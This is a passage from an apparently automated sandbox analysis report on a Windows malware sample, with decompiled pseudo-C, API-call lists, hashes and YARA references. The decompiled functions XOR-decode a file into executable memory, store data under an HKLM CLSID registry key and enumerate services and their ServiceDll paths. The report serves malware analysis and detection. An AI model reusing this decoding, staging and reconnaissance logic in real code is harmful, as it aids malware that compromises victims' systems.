								if(_t76 == 0 || ReadFile(_t62, _t76, _t71,  &_v12, 0) == 0) {
									goto L30;
								} else {
									_t69 = _v12;
									if(_t69 == _t71) {
										if(_v20 != 0 && _t69 > 1) {
											_t46 = 0;
											if(_t69 != 0) {
												do {
													if((_t46 & 0x00000001) != 0) {
														 *(_t76 + _t46) =  *(_t76 + _t46) ^ 0x0000006a;
													} else {
														 *(_t76 + _t46) =  *(_t76 + _t46) ^ 0x000000a7;
													}
													_t46 = _t46 + 1;
												} while (_t46 < _t69);
												_t69 = _v12;
											}
										}
										E04EC5500(_t76, _t69);
										_t67 = _v24;
										if(_t67 != 0) {
											 *_t67 = _v12;
										}
										goto L30;
									} else {
										VirtualFree(_t76, 0, 0x8000);
										CloseHandle(_v16);
										return 0;
									}
								}
							}
						}
					}
				}
			}





















                                                                                    0x04ec9740
                                                                                    0x04ec9749
                                                                                    0x04ec974b
                                                                                    0x04ec974e
                                                                                    0x04ec9751
                                                                                    0x04ec9756
                                                                                    0x04ec9758
                                                                                    0x04ec9758
                                                                                    0x04ec976d
                                                                                    0x04ec9773
                                                                                    0x04ec9779
                                                                                    0x04ec98cc
                                                                                    0x04ec98d2
                                                                                    0x04ec977f
                                                                                    0x04ec9789
                                                                                    0x04ec978b
                                                                                    0x04ec9791
                                                                                    0x04ec98c2
                                                                                    0x04ec98c5
                                                                                    0x00000000
                                                                                    0x04ec9797
                                                                                    0x04ec9797
                                                                                    0x04ec97a4
                                                                                    0x04ec97db
                                                                                    0x04ec9830
                                                                                    0x00000000
                                                                                    0x04ec97dd
                                                                                    0x04ec97ec
                                                                                    0x04ec97f0
                                                                                    0x00000000
                                                                                    0x04ec97f6
                                                                                    0x04ec97f6
                                                                                    0x04ec97fb
                                                                                    0x04ec97fd
                                                                                    0x04ec9802
                                                                                    0x04ec9809
                                                                                    0x04ec9809
                                                                                    0x04ec9810
                                                                                    0x04ec9816
                                                                                    0x00000000
                                                                                    0x04ec981c
                                                                                    0x04ec981c
                                                                                    0x04ec9828
                                                                                    0x00000000
                                                                                    0x04ec9828
                                                                                    0x04ec9816
                                                                                    0x04ec97f0
                                                                                    0x04ec97a6
                                                                                    0x04ec97b9
                                                                                    0x04ec98c1
                                                                                    0x00000000
                                                                                    0x04ec97bf
                                                                                    0x04ec97bf
                                                                                    0x04ec97c4
                                                                                    0x04ec97c6
                                                                                    0x04ec97cc
                                                                                    0x04ec97d3
                                                                                    0x04ec97d3
                                                                                    0x04ec9832
                                                                                    0x04ec9832
                                                                                    0x04ec9835
                                                                                    0x04ec983f
                                                                                    0x04ec9845
                                                                                    0x04ec9849
                                                                                    0x00000000
                                                                                    0x04ec985e
                                                                                    0x04ec985e
                                                                                    0x04ec9863
                                                                                    0x04ec988b
                                                                                    0x04ec9892
                                                                                    0x04ec9896
                                                                                    0x04ec9898
                                                                                    0x04ec989a
                                                                                    0x04ec98a2
                                                                                    0x04ec989c
                                                                                    0x04ec989c
                                                                                    0x04ec989c
                                                                                    0x04ec98a6
                                                                                    0x04ec98a7
                                                                                    0x04ec98ab
                                                                                    0x04ec98ab
                                                                                    0x04ec9896
                                                                                    0x04ec98b0
                                                                                    0x04ec98b5
                                                                                    0x04ec98ba
                                                                                    0x04ec98bf
                                                                                    0x04ec98bf
                                                                                    0x00000000
                                                                                    0x04ec9865
                                                                                    0x04ec986d
                                                                                    0x04ec9879
                                                                                    0x04ec9886
                                                                                    0x04ec9886
                                                                                    0x04ec9863
                                                                                    0x04ec9849
                                                                                    0x04ec97b9
                                                                                    0x04ec97a4
                                                                                    0x04ec9791

                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,00000000,?,?,?,04ECBFCE,00000001), ref: 04EC976D
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,04ECBFCE,00000001), ref: 04EC9783
                                                                                    • ReadFile.KERNEL32(?,00000001,00000004,04ECBFCE,00000000,00000000,?,?,?,04ECBFCE,00000001), ref: 04EC97EC
                                                                                    • SetFilePointer.KERNEL32(?,-00000003,00000000,00000000,?,?,?,04ECBFCE,00000001), ref: 04EC9828
                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,?,?,?,04ECBFCE,00000001), ref: 04EC983F
                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,04ECBFCE,00000000,?,?,?,04ECBFCE,00000001), ref: 04EC9854
                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,04ECBFCE,00000001), ref: 04EC986D
                                                                                    • CloseHandle.KERNEL32(?,?,?,04ECBFCE,00000001), ref: 04EC9879
                                                                                    • FindCloseChangeNotification.KERNEL32(?,?,?,?,04ECBFCE,00000001), ref: 04EC98C5
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$CloseReadVirtual$AllocChangeCreateFindFreeHandleNotificationPointerSize
                                                                                    • String ID:
                                                                                    • API String ID: 3130169213-0
                                                                                    • Opcode ID: c33d4010a682babe9c9c40bea467998fc3401cde9b25b86f2981b705853d3c13
                                                                                    • Instruction ID: 3d37dfa5805f80914a236cd0e8a0df336a0ba21828a7e360bc1579364a20a7f7
                                                                                    • Opcode Fuzzy Hash: c33d4010a682babe9c9c40bea467998fc3401cde9b25b86f2981b705853d3c13
                                                                                    • Instruction Fuzzy Hash: 6941B7B2F00215ABDB20CFA4DD44BAEBB79FB44714F205569E910EB281DB71EA02CB54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC9680, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60registryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 95%
                                                                                    			E04EC9680(void* __ebx, char* __ecx, int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v88;
				short _v608;
				void* _v612;
				signed int _t11;
				int _t20;
				char* _t26;
				int _t35;
				signed int _t38;

				_t11 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t11 ^ _t38;
				_t35 = __edx;
				_t26 = __ecx;
				E04EC5490(__ecx, __edx);
				E04EC6010(__ecx, L"Global",  &_v88, __edx, __esi); // executed
				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
				_v612 = 0;
				_t20 = RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0xf013f, 0,  &_v612, 0); // executed
				if(_t20 == 0) {
					RegSetValueExW(_v612, "1", _t20, 3, _t26, _t35); // executed
					_t37 =  ==  ? 1 : 0;
					RegCloseKey(_v612);
				}
				return E04ED572E(_v8 ^ _t38);
			}












                                                                                    0x04ec9689
                                                                                    0x04ec9690
                                                                                    0x04ec9696
                                                                                    0x04ec9698
                                                                                    0x04ec969a
                                                                                    0x04ec96a7
                                                                                    0x04ec96bc
                                                                                    0x04ec96cd
                                                                                    0x04ec96ea
                                                                                    0x04ec96f2
                                                                                    0x04ec9704
                                                                                    0x04ec9717
                                                                                    0x04ec971a
                                                                                    0x04ec971a
                                                                                    0x04ec9732

                                                                                    APIs
                                                                                      • Part of subcall function 04EC6010: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,00000378), ref: 04EC61B1
                                                                                      • Part of subcall function 04EC6010: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 04EC61DF
                                                                                      • Part of subcall function 04EC6010: RegCloseKey.ADVAPI32(?), ref: 04EC61F5
                                                                                    • wsprintfW.USER32 ref: 04EC96BC
                                                                                    • RegCreateKeyExW.KERNEL32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 04EC96EA
                                                                                    • RegSetValueExW.KERNEL32(?,04EFD09C,00000000,00000003,00000000,00000000), ref: 04EC9704
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04EC971A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseValue$CreateOpenQuerywsprintf
                                                                                    • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 73588525-1865207932
                                                                                    • Opcode ID: 2339ed76c213a062059769c523539c87b34460ade87e927e94d8b111acaa5a00
                                                                                    • Instruction ID: 8de0fa6c03fc6f4deb6eb00ab4d8010bc91f5fe14b4a1601e8ea972d9be5612b
                                                                                    • Opcode Fuzzy Hash: 2339ed76c213a062059769c523539c87b34460ade87e927e94d8b111acaa5a00
                                                                                    • Instruction Fuzzy Hash: 3C115671A0122CBBD720DBA5EC89EABBB7CEF84755F100069BD09E2144D675AE44DBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC5920, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,04ECBFAB), ref: 04EC5930
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04EC5937
                                                                                    • GetNativeSystemInfo.KERNEL32(?), ref: 04EC5957
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressInfoLibraryLoadNativeProcSystem
                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                    • API String ID: 2103483237-192647395
                                                                                    • Opcode ID: dc79a4466d0a7afcfea474f1623ec917e633d33736492b80d377cd924fe1de75
                                                                                    • Instruction ID: 138bd05e83242708cb27129c568d240af51845643fa7c00bdb365868f96443a9
                                                                                    • Opcode Fuzzy Hash: dc79a4466d0a7afcfea474f1623ec917e633d33736492b80d377cd924fe1de75
                                                                                    • Instruction Fuzzy Hash: 0EF0A721D4520957CB14DBE49E047FE77B8DB58309F54539AEC18A2100EA65BED1C751
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EE0B3C, Relevance: 4.6, APIs: 3, Instructions: 102COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    • Opcode ID: 974350fdc4d5283f417c0f62643b14919e29cb709d9829376dd887276987a618
                                                                                    • Instruction ID: a5f787a73497ff10ddf193da0edc5e60e4d78d0148662085ded5272bf64c02f2
                                                                                    • Opcode Fuzzy Hash: 974350fdc4d5283f417c0f62643b14919e29cb709d9829376dd887276987a618
                                                                                    • Instruction Fuzzy Hash: 8A2172726083556FFB149FB7AC50BFAB799EF4132CF14229ED845A7241EAB27901C250
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04D775CF, Relevance: 3.3, APIs: 2, Instructions: 255memorylibraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,?,?,00000000,00000000,?,?,?,?,?,04D77517), ref: 04D776C4
                                                                                    • LoadLibraryA.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,04D77517), ref: 04D777EB
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415882138.0000000004D77000.00000040.00000001.sdmp, Offset: 04D77000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: AllocLibraryLoadVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 3550616410-0
                                                                                    • Opcode ID: 54964fafae5adbbae320cbad7eeb31042311fe2330d2569e846e5de631a5928e
                                                                                    • Instruction ID: 2687a6eb7e6d04f62f798d91ae965cd665eef0beeb863f50a4b4eabe350d2d0f
                                                                                    • Opcode Fuzzy Hash: 54964fafae5adbbae320cbad7eeb31042311fe2330d2569e846e5de631a5928e
                                                                                    • Instruction Fuzzy Hash: 8DA16B71A0061A9FDB28CFA9C8807BEB7B5FF84308F298569D415DB244E738F941CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC6EB0, Relevance: 3.1, APIs: 2, Instructions: 70COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • OpenProcess.KERNEL32(00000400,00000000,00000000,00000000), ref: 04EC6ED2
                                                                                    • K32GetModuleFileNameExW.KERNEL32(00000000,00000000,?,00000104), ref: 04EC6EEF
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileModuleNameOpenProcess
                                                                                    • String ID:
                                                                                    • API String ID: 3261405110-0
                                                                                    • Opcode ID: a811fc18f21e54b751b3ee59bf8b3d4f2db57e8a4b0d6c3ac62c3dc61458adad
                                                                                    • Instruction ID: 02accd6374f70f1b4104802de58595d544eb540beea8e9abfb8a4ffb276f3ac3
                                                                                    • Opcode Fuzzy Hash: a811fc18f21e54b751b3ee59bf8b3d4f2db57e8a4b0d6c3ac62c3dc61458adad
                                                                                    • Instruction Fuzzy Hash: 5C11B175A102089ADB24EF78DD06BBBB3B8EF04344F1051AEEC09D7284EA65AA05C744
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04D774A1, Relevance: 2.6, APIs: 2, Instructions: 58memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04D774EF
                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04D7751F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415882138.0000000004D77000.00000040.00000001.sdmp, Offset: 04D77000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: Virtual$AllocFree
                                                                                    • String ID:
                                                                                    • API String ID: 2087232378-0
                                                                                    • Opcode ID: de5416433aabce8fea5c517e31233714484bb27793a4216edb05e0188f67f8db
                                                                                    • Instruction ID: 594e955f842589d8a361cff04ab13563ac53ba04e33d6b7a0469498e72cfc087
                                                                                    • Opcode Fuzzy Hash: de5416433aabce8fea5c517e31233714484bb27793a4216edb05e0188f67f8db
                                                                                    • Instruction Fuzzy Hash: 30018031B411187BE711ABA88C45BAEBBFCEF85715F6005A5F615EB280EE70BA0047A4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EE81E1, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,04EE8691,00000001,00000364,?,04EE0EDA,00000001,00000001), ref: 04EE8222
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 03e84a711cb195fd11636b335649d3087831fc5c03eb66ff0514f0fc63892291
                                                                                    • Instruction ID: ab489b89ecbff97fdc778c291ef0882b71079375b287989146f2e854dbb7978e
                                                                                    • Opcode Fuzzy Hash: 03e84a711cb195fd11636b335649d3087831fc5c03eb66ff0514f0fc63892291
                                                                                    • Instruction Fuzzy Hash: A9F0E935644D2466EB217B23BC00B7A7759FF8A778B196111AC05EB186DA30F80092E0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB1050, Relevance: 1.5, APIs: 1, Instructions: 22networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WSAStartup.WS2_32(00000202), ref: 04EB106E
                                                                                      • Part of subcall function 04ED5AD1: __onexit.LIBCMT ref: 04ED5AD7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Startup__onexit
                                                                                    • String ID:
                                                                                    • API String ID: 1034835647-0
                                                                                    • Opcode ID: ac62c1330a9643349b9e99a17a29b4dbe364a760ffe71a49ea721fb870d3388f
                                                                                    • Instruction ID: 90378cc43665961369d91b688cf147acebdd2885854dfcb9c668933dfa092483
                                                                                    • Opcode Fuzzy Hash: ac62c1330a9643349b9e99a17a29b4dbe364a760ffe71a49ea721fb870d3388f
                                                                                    • Instruction Fuzzy Hash: 89E0DFB0A0020CFBEB00EFA5AC0654DBBA4EB88214F4010A9E909C7240EA367E148B82
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Non-executed Functions

                                                                                    Function 04EC2F70, Relevance: 109.1, APIs: 60, Strings: 2, Instructions: 552servicememoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 88%
                                                                                    			E04EC2F70(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				short _v528;
				short _v1048;
				short _v1568;
				short _v2088;
				short _v2608;
				short _v3128;
				void* _v3132;
				int* _v3136;
				int _v3140;
				WCHAR** _v3144;
				long _v3148;
				int* _v3152;
				long _v3156;
				void* _v3160;
				int* _v3164;
				int* _v3168;
				void* _v3172;
				WCHAR* _v3176;
				WCHAR* _v3180;
				WCHAR* _v3184;
				int* _v3188;
				int _v3192;
				intOrPtr _v3196;
				int* _v3200;
				void* _v3204;
				void* _v3208;
				int _v3212;
				signed int _t206;
				int* _t214;
				long _t215;
				int** _t219;
				void* _t220;
				long _t225;
				void* _t234;
				WCHAR** _t252;
				int _t254;
				int _t255;
				int _t256;
				int _t257;
				int _t258;
				int _t259;
				int _t261;
				int _t263;
				int _t265;
				int _t267;
				int _t271;
				signed int _t295;
				signed int _t313;
				signed int _t319;
				signed int _t325;
				signed int _t333;
				int _t355;
				intOrPtr _t377;
				intOrPtr _t378;
				void* _t389;
				void* _t390;
				WCHAR** _t391;
				WCHAR* _t393;
				WCHAR* _t394;
				WCHAR* _t395;
				WCHAR* _t396;
				int* _t402;
				long _t405;
				void* _t408;
				int* _t423;
				void* _t426;
				void* _t443;
				WCHAR** _t444;
				void* _t445;
				void* _t447;
				void* _t448;
				void* _t449;
				void* _t451;
				void* _t453;
				void* _t455;
				void* _t457;
				void* _t459;
				void* _t461;
				void* _t463;
				void* _t470;
				signed int _t473;
				void* _t474;
				void* _t475;
				void* _t476;
				void* _t477;

				_t206 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t206 ^ _t473;
				_v3168 = 0;
				_v3152 = 0;
				_v3164 = 0;
				_t389 = OpenSCManagerW(0, 0, 0xf003f);
				_v3204 = _t389;
				if(_t389 == 0) {
					L3:
					return E04ED572E(_v8 ^ _t473);
				} else {
					__imp__EnumServicesStatusExW(_t389, 0, 0x30, 3, 0, 0,  &_v3168,  &_v3152,  &_v3164, 0);
					_t214 = _v3168;
					if(_t214 != 0) {
						_t215 =  &(_t214[0xb]);
						_v3160 = _t215;
						_t426 = LocalAlloc(0x40, _t215);
						_v3208 = _t426;
						if(_t426 != 0) {
							_v3164 = 0;
							_t219 =  &_v3168;
							__imp__EnumServicesStatusExW(_t389, 0, 0x30, 3, _t426, _v3160, _t219,  &_v3152,  &_v3164, 0);
							if(_t219 != 0) {
								_t220 = LocalAlloc(0x40, 0x19000);
								_v3132 = _t220;
								 *_t220 = 0x87;
								_v3148 = 1;
								_t390 = LocalAlloc(0x40, 0x2000);
								_v3188 = 0;
								_v3160 = _t390;
								_v3144 = LocalAlloc(0x40, 0x2000);
								E04EDDAD0(_t426,  &_v528, 0, 0x208);
								_t475 = _t474 + 0xc;
								_v3200 = 0;
								if(_v3152 <= 0) {
									_t225 = 1;
								} else {
									_t470 = lstrlenW;
									_t402 = _t426;
									_v3136 = _t402;
									do {
										_t429 = 0x4efb5d0;
										_v3196 = 0xffffffff;
										_v3156 = 0x4efb5d0;
										 *_v3144 = 0x4efb5d0;
										_v3176 = 0x4efb5d0;
										_v3180 = 0x4efb5d0;
										_v3184 = 0x4efb5d0;
										_t234 = OpenServiceW(_v3204,  *_t402, 1);
										_v3140 = _t234;
										if(_t234 == 0) {
											_t391 = _v3144;
										} else {
											_t402 =  &_v3188;
											if(QueryServiceConfigW(_t234, _t390, 0x2000, _t402) != 0) {
												_v3196 =  *((intOrPtr*)(_t390 + 4));
												_t429 =  !=  ?  *((intOrPtr*)(_t390 + 0xc)) : 0x4efb5d0;
												_t377 =  *((intOrPtr*)(_t390 + 0x10));
												_v3156 = 0x4efb5d0;
												_t412 =  !=  ? _t377 : 0x4efb5d0;
												_t378 =  *((intOrPtr*)(_t390 + 0x18));
												_v3176 =  !=  ? _t377 : 0x4efb5d0;
												_t414 =  !=  ? _t378 : 0x4efb5d0;
												_v3180 =  !=  ? _t378 : 0x4efb5d0;
												_t402 =  !=  ?  *((intOrPtr*)(_t390 + 0x1c)) : 0x4efb5d0;
												_v3184 = _t402;
											}
											_t391 = _v3144;
											__imp__QueryServiceConfig2W(_v3140, 1, _t391, 0x2000,  &_v3188);
											if( *_t391 == 0) {
												 *_t391 = 0x4efb5d0;
											}
											CloseServiceHandle(_v3140);
										}
										E04EDDAD0(_t429,  &_v528, 0, 0x208);
										E04EDDAD0(_t429,  &_v1048, 0, 0x208);
										wsprintfW( &_v3128, L"SYSTEM\\CurrentControlSet\\Services\\%s\\Parameters",  *_v3136);
										_v3192 = 0x104;
										_v3140 = 0;
										E04EDDAD0(_t429,  &_v1048, 0, 0x104);
										_t476 = _t475 + 0x30;
										_v3172 = 0;
										if(RegOpenKeyExW(0x80000002,  &_v3128, 0, 0x20119,  &_v3172) != 0) {
											L21:
											_push(_t402);
											E04EC5FA0(_t429,  &_v1048);
											E04EC5D90(_t391,  &_v1048,  &_v1568, _t429, _t470,  &_v2088,  &_v2608);
											_t477 = _t476 + 0xc;
										} else {
											RegQueryValueExW(_v3172, L"ServiceDll", 0,  &_v3212,  &_v1048,  &_v3192);
											_t402 = 1;
											_t363 =  ==  ? 1 : _v3140;
											_v3140 =  ==  ? 1 : _v3140;
											RegCloseKey(_v3172);
											if(_v3140 == 0 || _v3192 <= 0) {
												goto L21;
											} else {
												ExpandEnvironmentStringsW( &_v1048,  &_v528, 0x104);
												E04EC5D90(_t391,  &_v528,  &_v1568, _t429, _t470,  &_v2088,  &_v2608);
												_t477 = _t476 + 8;
											}
										}
										_t252 = _v3136;
										_v3140 = lstrlenW(_t252[1]);
										_t254 = lstrlenW( *_t391);
										_t255 = lstrlenW( *_t252);
										_t256 = lstrlenW(_v3184);
										_t257 = lstrlenW(_v3180);
										_t258 = lstrlenW(_v3176);
										_t393 = _v3156;
										_t259 = lstrlenW(_t393);
										_t261 = lstrlenW( &_v1568);
										_t263 = lstrlenW( &_v2088);
										_t265 = lstrlenW( &_v2608);
										_t267 = lstrlenW( &_v528);
										_t443 = _v3132;
										_v3156 = _v3148 + 0x3e + _v3140 + _t254 + _t255 + _t256 + _t257 + _t258 + _t259 + _t261 + _t263 + _t265 + _t267 + _v3140 + _t254 + _t255 + _t256 + _t257 + _t258 + _t259 + _t261 + _t263 + _t265 + _t267;
										_t271 = LocalSize(_t443);
										_t405 = _v3156;
										if(_t271 < _t405) {
											_v3132 = LocalReAlloc(_t443, _t405, 0x42);
										}
										_t444 = _v3136;
										E04EDDC90(_v3132 + _v3148,  *_t444, 2 + lstrlenW( *_t444) * 2);
										_t445 = _v3148 + 2 + lstrlenW( *_t444) * 2;
										E04EDDC90(_v3132 + _t445, _v3136[1], 2 + lstrlenW(_v3136[1]) * 2);
										_t447 = _t445 + lstrlenW(_v3136[1]) * 2 + 2;
										E04EDDC90(_v3132 + _t447,  *_v3144, 2 + lstrlenW( *_v3144) * 2);
										_t295 = lstrlenW( *_v3144);
										_t408 = _v3132;
										_t448 = _t447 + _t295 * 2;
										asm("movups xmm0, [eax+0x8]");
										asm("movups [edi+ecx+0x2], xmm0");
										asm("movups xmm0, [eax+0x18]");
										asm("movups [edi+ecx+0x12], xmm0");
										 *(_t448 + _t408 + 0x22) = _v3136[0xa];
										 *((intOrPtr*)(_t448 + _t408 + 0x26)) = _v3196;
										_t449 = _t448 + 0x2a;
										E04EDDC90(_v3132 + _t449, _t393, 2 + lstrlenW(_t393) * 2);
										_t451 = _t449 + lstrlenW(_t393) * 2 + 2;
										E04EDDC90(_v3132 + _t451,  &_v528, 2 + lstrlenW( &_v528) * 2);
										_t313 = lstrlenW( &_v528);
										_t394 = _v3176;
										_t453 = _t451 + _t313 * 2 + 2;
										E04EDDC90(_v3132 + _t453, _t394, 2 + lstrlenW(_t394) * 2);
										_t319 = lstrlenW(_t394);
										_t395 = _v3180;
										_t455 = _t453 + _t319 * 2 + 2;
										E04EDDC90(_v3132 + _t455, _t395, 2 + lstrlenW(_t395) * 2);
										_t325 = lstrlenW(_t395);
										_t396 = _v3184;
										_t457 = _t455 + _t325 * 2 + 2;
										E04EDDC90(_v3132 + _t457, _t396, 2 + lstrlenW(_t396) * 2);
										_t459 = _t457 + lstrlenW(_t396) * 2 + 2;
										_t333 = lstrlenW( &_v1568);
										_t397 = _v3132;
										E04EDDC90(_t459 + _v3132,  &_v1568, 2 + _t333 * 2);
										_t461 = _t459 + lstrlenW( &_v1568) * 2 + 2;
										E04EDDC90(_t461 + _v3132,  &_v2088, 2 + lstrlenW( &_v2088) * 2);
										_t463 = _t461 + lstrlenW( &_v2088) * 2 + 2;
										E04EDDC90(_t463 + _t397,  &_v2608, 2 + lstrlenW( &_v2608) * 2);
										_t475 = _t477 + 0x84;
										_t355 = lstrlenW( &_v2608);
										_t423 =  &(_v3200[0]);
										_t390 = _v3160;
										_t402 =  &(_v3136[0xb]);
										_v3200 = _t423;
										_t225 = _t463 + (_t355 + 1) * 2;
										_v3136 = _t402;
										_v3148 = _t225;
									} while (_t423 < _v3152);
								}
								LocalReAlloc(_v3132, _t225, 0x42);
								LocalFree(_v3144);
								LocalFree(_t390);
								LocalFree(_v3208);
								CloseServiceHandle(_v3204);
								return E04ED572E(_v8 ^ _t473);
							} else {
								CloseServiceHandle(_t389);
								LocalFree(_t426);
								return E04ED572E(_v8 ^ _t473);
							}
						} else {
							CloseServiceHandle(_t389);
							return E04ED572E(_v8 ^ _t473);
						}
					} else {
						CloseServiceHandle(_t389);
						goto L3;
					}
				}
			}

























































































                                                                                    0x04ec2f79
                                                                                    0x04ec2f80
                                                                                    0x04ec2f8d
                                                                                    0x04ec2f97
                                                                                    0x04ec2fa1
                                                                                    0x04ec2fb1
                                                                                    0x04ec2fb3
                                                                                    0x04ec2fbb
                                                                                    0x04ec2ff6
                                                                                    0x04ec3006
                                                                                    0x04ec2fbd
                                                                                    0x04ec2fdf
                                                                                    0x04ec2fe5
                                                                                    0x04ec2fed
                                                                                    0x04ec300e
                                                                                    0x04ec3015
                                                                                    0x04ec301d
                                                                                    0x04ec301f
                                                                                    0x04ec3027
                                                                                    0x04ec304b
                                                                                    0x04ec305d
                                                                                    0x04ec3072
                                                                                    0x04ec307a
                                                                                    0x04ec30a4
                                                                                    0x04ec30ad
                                                                                    0x04ec30b3
                                                                                    0x04ec30b6
                                                                                    0x04ec30c7
                                                                                    0x04ec30c9
                                                                                    0x04ec30d5
                                                                                    0x04ec30e2
                                                                                    0x04ec30f1
                                                                                    0x04ec30f6
                                                                                    0x04ec30f9
                                                                                    0x04ec310a
                                                                                    0x04ec36c2
                                                                                    0x04ec3110
                                                                                    0x04ec3110
                                                                                    0x04ec3116
                                                                                    0x04ec3118
                                                                                    0x04ec3120
                                                                                    0x04ec3126
                                                                                    0x04ec312d
                                                                                    0x04ec3137
                                                                                    0x04ec313d
                                                                                    0x04ec3141
                                                                                    0x04ec314d
                                                                                    0x04ec3153
                                                                                    0x04ec3159
                                                                                    0x04ec315f
                                                                                    0x04ec3167
                                                                                    0x04ec320f
                                                                                    0x04ec316d
                                                                                    0x04ec316d
                                                                                    0x04ec3183
                                                                                    0x04ec318d
                                                                                    0x04ec3198
                                                                                    0x04ec319b
                                                                                    0x04ec31a0
                                                                                    0x04ec31a6
                                                                                    0x04ec31a9
                                                                                    0x04ec31ac
                                                                                    0x04ec31b9
                                                                                    0x04ec31bf
                                                                                    0x04ec31cc
                                                                                    0x04ec31cf
                                                                                    0x04ec31cf
                                                                                    0x04ec31d5
                                                                                    0x04ec31f0
                                                                                    0x04ec31f9
                                                                                    0x04ec31fb
                                                                                    0x04ec31fb
                                                                                    0x04ec3207
                                                                                    0x04ec3207
                                                                                    0x04ec3223
                                                                                    0x04ec3236
                                                                                    0x04ec324f
                                                                                    0x04ec3257
                                                                                    0x04ec3267
                                                                                    0x04ec3274
                                                                                    0x04ec3279
                                                                                    0x04ec327c
                                                                                    0x04ec32a8
                                                                                    0x04ec3348
                                                                                    0x04ec3348
                                                                                    0x04ec3351
                                                                                    0x04ec3370
                                                                                    0x04ec3375
                                                                                    0x04ec32ae
                                                                                    0x04ec32d0
                                                                                    0x04ec32de
                                                                                    0x04ec32e9
                                                                                    0x04ec32ec
                                                                                    0x04ec32f2
                                                                                    0x04ec3300
                                                                                    0x00000000
